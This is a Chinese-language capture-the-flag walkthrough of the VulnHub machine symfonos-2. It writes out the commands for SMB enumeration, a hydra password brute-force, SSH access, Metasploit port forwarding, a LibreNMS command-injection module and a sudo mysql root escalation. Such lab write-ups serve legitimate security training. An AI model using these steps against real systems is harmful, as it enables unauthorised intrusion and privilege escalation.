标签：SMB共享、hydra爆破、端口转发、命令注入、mysql提权

0x00 环境准备

下载地址：https://www.vulnhub.com/entry/symfonos-2,331/
flag数量：1
攻击机：kali
攻击机地址：192.168.1.31
靶机描述：

OSCP-like Intermediate real life based machine designed to teach the importance of understanding a vulnerability. SHOULD work for both VMware and Virtualbox.

0x01 信息搜集

1.探测靶机地址

命令：arp-scan -l

靶机地址是192.168.1.42

2.探测靶机开放端口

命令：nmap -sV -p- 192.168.1.42

开放了5个端口，老规矩看一下80端口，还是一张图片，扫描目录也没扫出来啥。应该和symfonos1一样，还是先使用smb共享服务找到信息。

0x02 SMB

使用smbclient工具枚举共享文件，命令：smbclient -L 192.168.1.42

发现一个目录，尝试进入目录，命令：smbclient //192.168.1.42/anonymous

不需要密码就可以进入，进入后发现里面还有一个backups目录，再进去看一下

进去后，里面有个log.txt文件，下载下来看一下。

在ProFTPD的配置文件下发现了aeolus用户，尝试使用九头蛇爆破一下。

0x03 hydra爆破ftp

命令：hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.42

字典使用rockyou.txt，线程默认线程就可以了，不然太大的话会导致拒绝服务。
爆破出来了，密码：aeolus \ sergioteamo
刚才在扫描端口的时候发现22端口也开放了，尝试使用ftp的账号密码登录ssh的账号密码，命令：ssh aeolus@192.168.1.42

登录成功

0x04 端口转发

做到这里，已经连接上SSH了，我以为就要提权了，然后看了一下表哥的文章，发现还没有到提权的地步。以下内容参考表哥的文章，文章链接我会在最后放出来。

由于使用SSH登录的情况下会对很多命令有限制

既然知道了账号密码，那就使用metasploit工具进行SSH登录
①启动metasploit，命令：msfconsole

②查找ssh登录模块，命令：search ssh_login

使用第一个
③看一下需要设置哪些选项，命令：show options

设置目标地址，账号和密码，然后运行

连接成功
④将sessions升级为一个meterpreter会话
查看sessions

将sessions升级为一个meterpreter会话，命令：sessions -u 1

使用sessions 2

⑤检查网络相关信息，命令：netstat

发现它监听了本地的8080端口，且只允许来自靶机自身的连接
⑥端口转发
使用portfwd工具，portfwd工具在metasploit中就可以使用。
由于我第一次使用，先看一下帮助文档

那就将本地的9001端口映射到靶机的8080端口，命令：portfwd add -l 9001 -r 127.0.0.1 -p 8080

端口转发成功

0x05 命令注入getshell

访问本地的9001端口

是一个登录界面，使用刚才爆破出的ftp账号尝试登录，aeolus \ sergioteamo

登录成功
使用metasploit查找librenms是否存在漏洞

发现了两个命令注入的漏洞，使用第一个试一下
查看选项

设置参数

利用成功，切换到shell模式

0x06 提权

查看当前用户的命令和权限相关信息，命令：sudo -l

发现mysql在不使用密码的情况下可以以root的身份运行
提权，命令：sudo mysql -e "\! /bin/bash"

-e参数作用是执行语句并退出

提权成功
flag在/root下

0x07 小结

靶机从SMB共享服务中枚举出共享文件，在文件中发现了ftp服务的用户名，并且使用hydra爆破出了用户密码。巧合的是SSH服务和FTP服务使用的是相同的账号密码，这样就登录了SSH服务，通过使用msf的meterpreter工具，发现在靶机内网中还有一个网站，使用端口转发工具访问到网站后，利用已有漏洞getshell。使用新的shell身份发现mysql具有root权限并且可以运行mysql，最后使用mysql进行提权，拿到flag。

由于我不会每天都登录简书，所以有什么私信或者评论我都不能及时回复，如果想要联系我最好给我发邮件，邮箱：Z2djMjUxMTBAMTYzLmNvbQ==，如果发邮件请备注“简书”

参考链接：

1.https://exzandar.home.blog/2020/02/15/the-walk-through-of-symfonos-2-machine-from-vulnhub/
2.玩转靶机：symfonos1 + symfonos2 + matrix_v3
3.[shell]Linux脚本开头#!/bin/bash和#!/bin/sh是什么意思以及区别